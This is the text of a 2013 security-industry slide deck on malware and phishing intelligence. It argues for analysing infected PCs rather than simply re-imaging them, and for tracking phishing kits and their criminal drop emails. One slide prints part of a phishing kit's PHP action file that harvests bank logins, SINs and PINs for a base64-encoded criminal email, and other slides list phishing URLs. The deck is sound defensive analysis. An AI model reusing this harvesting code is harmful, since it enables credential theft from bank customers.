Post on 25-Feb-2016
description
CONFIDENTIAL 1
Malware & Phishing Intelligence
CONFIDENTIAL 2
Agenda:Malware – “re-image vs. intelligence”Phishing – “takedown vs. intelligence”
CONFIDENTIAL 3
What do you do with an Infected PC?
“Our policy is to re-image the computer. No questions. No exceptions.”
• Does that sound familiar?
• We hear the argument that this is the “safest” option.
• What’s the worst that can happen?
CONFIDENTIAL 4
What is your Worst Case Scenario?
Global Thermonuclear War?
CONFIDENTIAL 5
What is your Worst Case Malware Scenario?
Data breach involving Intellectual Property?Direct Financial Loss?
Data Breach Involving PII?
CONFIDENTIAL 6
Verizon 2013 Data Breach Investigations ReportStudy of 47,000 security incidents with 621 confirmed data breaches: 40% of all data breaches were caused by malware. 47% of those malware attacks originated with an E-mail attachment
In “Large Enterprises” – 63% of malware attacks originated with an Email attachment.
http://www.verizonenterprise.com/DBIR/2013/
“Keep in mind that these vectors are not mutually exclusive. In many cases, an actor may gain initial entry using a malicious e-mail attachment, and then install additional malware on that and other systems throughout the environment.”
CONFIDENTIAL 7
The inevitable Click
• How many emails do I have to send your employees to get someone to click on it?
• Three = 50% chance. Ten = “Guaranteed”
ThreatSim.com Quoted in Verizon DBIR
CONFIDENTIAL 8
Recent Threats
CONFIDENTIAL 9
Top malicious spam of August 5, 2013
CONFIDENTIAL 10
typical
This is what the AV detection looked like for Tuesday morning’s top malicious spam campaign.
Four hours into the campaign, detection 2/46.
CONFIDENTIAL 11
Same malware, 13 hours later• Detection rate now 17 vendors detecting
CONFIDENTIAL 12
ATTACK!Now what if AFTER all of that happens, we now realize the email had malware in it, and we send a PC tech to format BlueGuy’s machine?
TOP SECRET
CONFIDENTIAL 13
Long Detect Times• Mandiant reported in “M-Trends 2013: Attack
the Security Gap” that THE MEDIAN NUMBER OF DAYS from evidence of compromise to discovery of compromise was 243 DAYS!
• General Keith Alexander told an audience at Georgia Tech “Most of the folks who get into the networks are in there for six- to nine months before they’re discovered.
• M-Trends 2013: Attack the Security Gap™, https://www.mandiant.com/resources/m-trends/ March 2013.• Prince, Brian, “NSA Director: Information-Sharing Critical to U.S. Cybersecurity”,
www.darkreading.com/government-vertical/nsa-director-information-sharing-critica/240151955. March 29, 2013
CONFIDENTIAL 14
Malware Intelligence1. What CAN THIS MALWARE DO?2. Where did it come from?
a) What was the initial attack vector?b) Has that vector contacted any other resource?
3. What does this computer HAVE ACCESS TO?4. What has the infected computer DONE?
a) Has the infected computer received additional files?
b) Has the infected computer exfiltrated data?c) Are there any new accounts or files since infection?d) Has the infected computer exceeded or attempted
to exceed authority on any internal resources?
CONFIDENTIAL 15
Today’s Top Threat
• Each day we document the behavior of the Top Threat emails– What is the spam subject?– What hostile URLs are advertised?– What hostile attachments are present?– What network touches does the malware make?– What additional malware drops if executed?
CONFIDENTIAL 16
Cyber Intelligence?
“The acquisition and analysis of information to identify, track, and predict cyber capabilities, intentions, and activities that offer courses of action to enhance decision making.”
http://www.sei.cmu.edu/library/assets/whitepapers/citp-summary-key-findings.pdf
CONFIDENTIAL 17
Phishing Intelligence
CONFIDENTIAL 18
http://www.go-polymers.com/components/rbc/index.phpFebruary 27, 2013
CONFIDENTIAL 19
http://www.go-polymers.com/flash/hsbc.com.bh12idv/Authentication/idv.Authentication.htm
February 27, 2013
CONFIDENTIAL 20
http://www.go-polymers.com/admin/authentication.bns_Scotiabank/
authentication.bns.htm
February 22, 2013
CONFIDENTIAL 21
Phishing Timeline (Takedown View)
• GOAL: Protect customer credentials by improving Takedown speed. Time is Money.
CONFIDENTIAL 22
Phishing Clusters• For a single brand, we present the various
phishing clusters seen against that brand.• Phishing sites in the same cluster are composed
of highly similar files.
CONFIDENTIAL 23
Trend Analysis• By using the Conditional Formatting feature in
i2, we can identify “emerging threats”.
In this Conditional Formatting layout, phishing sites that were found in the current month are turned red and enlarged, while older phish are “greyed out”.
CONFIDENTIAL 24
Phishing Kits
Phishing sites are usually made by hacking an existing website and uploading a set of files necessary to create the look and feel of the brand being imitated.
Action files, usually with a .PHP extension, handle the business of sending the stolen data to the criminal via an email message.
When a criminal has a kit that proves successful, they tend to re-use the kit until something stops them.
CONFIDENTIAL 25
Confirm.php<?php$ip = $_SERVER['REMOTE_ADDR'];$user = $_POST['user'];$pass = $_POST['pass'];$q1 = $_POST['q1'];$a1 = $_POST['a1'];$q2 = $_POST['q2'];$a2 = $_POST['a2'];$q3 = $_POST['q3'];$a3 = $_POST['a3'];$sin1 = $_POST['sin1'];$sin2 = $_POST['sin2'];$sin3 = $_POST['sin3'];$dobd = $_POST['dobd'];$dobm = $_POST['dobm'];$doby = $_POST['doby'];$dl = $_POST['dl'];$issue = $_POST['issue'];$pin = $_POST['pin'];$email = $_POST['email'];$emailp = $_POST['emailp'];
$data ="--------- G00dLuck ---------User: $userPass: $pass-----Q1: $q1A1 $a1Q2: $q2A2 $a2Q3: $q3A3 $a3----Dob: $dobd - $dobm - $dobySIN : $sin1 - $sin2 - $sin3Dl : $dl Pin: $pin Issue: $issueE-mail: $email / $emailp--Ip: $ip--------- G00dLuck ---------";$emailusr1 = base64_decode('c29mb3RleDJAZ21haWwuY29t'); $emailusr2 = base64_decode('');
$subj="RBC # $user - $pass - $doby - $dl";
$emailusr1 = base64_decode('c29mb3RleDJAZ21haWwuY29t');
Which decodes to: sofotex2@gmail.com
CONFIDENTIAL 26
Overlaying Drop Email data
• Each red point indicates a criminal’s email.• More lines = more phishing sites for that email.
CONFIDENTIAL 27
Phishing Timeline (Intelligence View)GOAL: Drive Major Criminals Away from OUR BRAND
CONFIDENTIAL 28
phishiq.com/submit• We’re always
looking for new sources of phishing or spam data.
• An online form is available, but feel free to contact if you are a “high volume” contributor.
CONFIDENTIAL 29
Thank you!Let’s discuss . . .
Gary Warnerwww.malcovery.com@garwarner@malcovery
CONFIDENTIAL 30
Additional Discussion points . . .
CONFIDENTIAL 31
Infected machine• Sensitive Data Inventory• What data was ON the machine?• What data could be ACCESSED FROM the machine?• Was it accessed? Did it leave?
• Are there additional user accounts?• What programs / files / DLLs have been added that
are not “company standard” in the last 90 days• Did this computer attempt any unusual internal
resource logins or accesses?• (rate / userid / time of day / day of week)
CONFIDENTIAL 32
Best Case Scenario• Malware was detected today• A clear source of infection is readily identifiable
from today• Only a single “unexplained” EXE or DLL is found
on the machine, and it matches the signature• The malware is well understood, widely
detected, and has a clear and limited purpose
CONFIDENTIAL 33
Our Porous Perimeters• Is the machine mobile?• Is it “forced VPN” back to our organization?• If mobile, and if unlimited access – we don’t
know what it did at or outside the perimeter because we don’t control the perimeter
• Home network, Starbucks wifi, hotel wifi – data exfil could occur in places where we don’t monitor the network